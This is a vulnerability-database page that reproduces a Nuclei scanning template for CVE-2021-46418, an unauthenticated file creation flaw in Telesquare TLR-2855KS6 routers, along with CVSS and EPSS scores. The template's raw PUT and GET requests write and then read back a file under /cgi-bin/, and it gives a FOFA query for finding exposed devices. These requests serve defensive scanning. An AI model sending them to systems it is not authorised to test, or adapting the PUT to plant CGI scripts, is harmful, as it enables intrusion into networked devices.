Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-46418
HistoryApr 03, 2024 - 7:09 a.m.

Telesquare TLR-2855KS6 - Arbitrary File Creation

2024-04-0307:09:23
ProjectDiscovery
github.com
8
telesquare
file creation
vulnerability
cgi scripts
http
packetstorm
cve
intrusion
lighttpd
text/plain

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

EPSS

0.069

Percentile

94.0%

An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
id: CVE-2021-46418

info:
  name: Telesquare TLR-2855KS6 - Arbitrary File Creation
  author: DhiyaneshDK
  severity: high
  description: |
    An unauthorized file creation vulnerability in Telesquare TLR-2855KS6 via PUT method can allow creation of CGI scripts.
  reference:
    - http://packetstormsecurity.com/files/166674/Telesquare-TLR-2855KS6-Arbitrary-File-Creation.html
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46418
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46418
    epss-score: 0.07418
    epss-percentile: 0.94089
    cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: telesquare
    product: "tlr-2855ks6"
    fofa-query: "product==\"TELESQUARE-TLR-2855KS6\""
  tags: packetstorm,cve,cve2021,telesquare,intrusive
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        PUT /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

        {{randstr}}
      - |
        GET /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 201'
          - 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")'
          - 'contains(body_2, "{{randstr}}")'
        condition: and
# digest: 4a0a0047304502205bfc9f8b8c9e5038d1c3cd44bcc15e4ef08e2a344a2dddf2d3f1f9c55ed02521022100d0d00b82efff29a484e4e1cb3b1d1dd3ab7acdc204c311843553ab09aa2e7524:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

EPSS

0.069

Percentile

94.0%

Related for NUCLEI:CVE-2021-46418